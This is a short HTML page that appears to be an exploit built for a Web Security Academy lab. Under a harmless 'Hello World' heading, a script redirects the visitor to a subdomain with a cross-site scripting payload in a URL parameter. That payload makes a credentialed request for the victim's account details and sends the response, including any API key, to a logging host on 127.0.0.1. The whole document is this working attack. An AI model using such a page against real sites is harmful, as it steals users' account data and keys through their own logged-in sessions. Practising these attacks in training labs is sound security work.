<html>
    <body>
        <h1>Hello World!</h1>
        <script>
            document.location="http://stock.acba1f641ec6260cc0f67709008d00fe.web-security-academy.net/?productId=<script>var xhr = new XMLHttpRequest();var url = 'https://acba1f641ec6260cc0f67709008d00fe.web-security-academy.net';xhr.onreadystatechange = function(){if (xhr.readyState == XMLHttpRequest.DONE) {fetch('http://127.0.0.1:5555/log?key=' %2b xhr.responseText)};};xhr.open('GET', url %2b '/accountDetails', true); xhr.withCredentials = true;xhr.send(null);%3c/script>&storeId=1"
        </script>
    </body>
</html>